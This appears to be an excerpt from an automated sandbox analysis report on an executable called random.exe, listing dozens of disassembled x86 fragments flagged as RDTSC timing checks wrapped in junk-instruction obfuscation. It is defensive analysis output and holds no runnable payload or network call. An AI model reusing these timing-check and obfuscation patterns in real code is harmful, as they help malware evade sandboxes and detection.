Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985F02 second address: 985F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 sub dword ptr [ebp+122D37FEh], edx 0x0000000d push 00000003h 0x0000000f mov edi, dword ptr [ebp+122D2D23h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F5FF4F12448h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 sub cl, 00000033h 0x00000034 mov di, D135h 0x00000038 push 00000003h 0x0000003a add dx, 2356h 0x0000003f call 00007F5FF4F12449h 0x00000044 pushad 0x00000045 push ebx 0x00000046 jmp 00007F5FF4F1244Bh 0x0000004b pop ebx 0x0000004c jp 00007F5FF4F1244Ch 0x00000052 popad 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F5FF4F12451h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985F81 second address: 985F85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985F85 second address: 985F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985F8B second address: 985F91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985F91 second address: 985FAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d jg 00007F5FF4F12448h 0x00000013 pop edx 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985FAF second address: 985FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985FB5 second address: 985FE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12456h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F5FF4F1244Ch 0x00000015 ja 00007F5FF4F12446h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985FE1 second address: 98600D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [ebp+122D3AF8h], ecx 0x00000011 lea ebx, dword ptr [ebp+1244B8FBh] 0x00000017 or ecx, 2C64CA64h 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5FF4AFEFFAh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 98600D second address: 986020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F1244Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 986020 second address: 986048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF006h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5FF4AFEFFBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A8C20 second address: 9A8C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F5FF4F1244Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F5FF4F12446h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A8C3D second address: 9A8C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A6A7D second address: 9A6A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5FF4F1244Bh 0x0000000b js 00007F5FF4F12446h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A6BE3 second address: 9A6BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A6BE7 second address: 9A6BED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A6BED second address: 9A6BF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5FF4AFEFF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A6BF7 second address: 9A6C14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12452h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A6D3A second address: 9A6D5D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5FF4AFEFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b jnp 00007F5FF4AFF012h 0x00000011 jmp 00007F5FF4AFEFFEh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A71A2 second address: 9A71AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A71AC second address: 9A71B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F5FF4AFEFF6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A71B9 second address: 9A71C3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5FF4F12446h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A71C3 second address: 9A71DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F5FF4AFF002h 0x0000000f js 00007F5FF4AFEFF6h 0x00000015 jp 00007F5FF4AFEFF6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A7342 second address: 9A734F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A734F second address: 9A7355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A7355 second address: 9A7363 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F5FF4F1244Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A74E1 second address: 9A74E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A7623 second address: 9A7629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A7629 second address: 9A762F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A762F second address: 9A7635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A77A2 second address: 9A77C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnl 00007F5FF4AFF002h 0x0000000c jne 00007F5FF4AFEFFAh 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A77C7 second address: 9A77D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A77D3 second address: 9A77D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A77D7 second address: 9A77ED instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5FF4F12446h 0x00000008 jp 00007F5FF4F12446h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A7BF8 second address: 9A7BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 99E55E second address: 99E566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 99E566 second address: 99E56A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A82BC second address: 9A82C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A82C0 second address: 9A8305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5FF4AFF008h 0x00000008 jns 00007F5FF4AFEFF6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F5FF4AFF009h 0x00000015 popad 0x00000016 js 00007F5FF4AFF002h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A8305 second address: 9A830B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A8465 second address: 9A8469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A8469 second address: 9A8473 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A85FE second address: 9A8602 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A8602 second address: 9A863C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F5FF4F1244Eh 0x0000000c pushad 0x0000000d popad 0x0000000e jng 00007F5FF4F12446h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5FF4F1244Ah 0x0000001e jmp 00007F5FF4F12457h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A863C second address: 9A8662 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF008h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A87C3 second address: 9A87CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5FF4F12446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A87CD second address: 9A881E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5FF4AFF006h 0x0000000d jnl 00007F5FF4AFF011h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jno 00007F5FF4AFEFF6h 0x0000001d jng 00007F5FF4AFEFF6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9A881E second address: 9A8825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9AC4FA second address: 9AC4FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9AC4FE second address: 9AC504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9AC504 second address: 9AC50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9AC71C second address: 9AC727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5FF4F12446h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9AFA33 second address: 9AFA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F5FF4AFEFF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9AFA42 second address: 9AFA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B48D1 second address: 9B48D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B4777 second address: 9B477B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B477B second address: 9B478B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F5FF4AFEFF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B478B second address: 9B478F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B478F second address: 9B4795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B6E6F second address: 9B6E7D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F5FF4F1244Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B6F71 second address: 9B6F76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B70AC second address: 9B70B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B7753 second address: 9B7764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFEFFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B7764 second address: 9B7777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FF4F1244Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B794F second address: 9B7959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5FF4AFEFF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B7B7B second address: 9B7B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B7D23 second address: 9B7D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B7D28 second address: 9B7D2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B7D2E second address: 9B7D54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF005h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c je 00007F5FF4AFF00Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B7D54 second address: 9B7D7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F1244Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+1244A1ABh], ebx 0x00000010 push eax 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5FF4F1244Bh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B8286 second address: 9B8296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F5FF4AFEFF6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B8332 second address: 9B8337 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B8C53 second address: 9B8C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B8C57 second address: 9B8C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BB193 second address: 9BB19D instructions: 0x00000000 rdtsc 0x00000002 je 00007F5FF4AFEFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BB19D second address: 9BB1A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F5FF4F12446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BB1A7 second address: 9BB1AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BBCE1 second address: 9BBCE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BB9C0 second address: 9BB9C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BC911 second address: 9BC921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F5FF4F12448h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BB9C6 second address: 9BB9CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BD403 second address: 9BD471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F5FF4F12448h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 jbe 00007F5FF4F12448h 0x00000028 mov edi, ebx 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d jmp 00007F5FF4F12453h 0x00000032 pop esi 0x00000033 push 00000000h 0x00000035 jmp 00007F5FF4F1244Eh 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F5FF4F12458h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BFE6C second address: 9BFE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BFE70 second address: 9BFED4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F5FF4F1244Fh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F5FF4F12448h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c and bx, 4500h 0x00000031 xchg eax, esi 0x00000032 pushad 0x00000033 pushad 0x00000034 push eax 0x00000035 pop eax 0x00000036 push ebx 0x00000037 pop ebx 0x00000038 popad 0x00000039 pushad 0x0000003a push edx 0x0000003b pop edx 0x0000003c push ebx 0x0000003d pop ebx 0x0000003e popad 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 jmp 00007F5FF4F1244Ah 0x00000049 pop ebx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BFED4 second address: 9BFEDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C0E85 second address: 9C0F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 or ebx, dword ptr [ebp+122D3736h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F5FF4F12448h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F5FF4F12448h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 pushad 0x00000047 jc 00007F5FF4F12447h 0x0000004d cld 0x0000004e jmp 00007F5FF4F12457h 0x00000053 popad 0x00000054 mov bl, 29h 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F5FF4F12454h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BF034 second address: 9BF03E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5FF4AFEFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
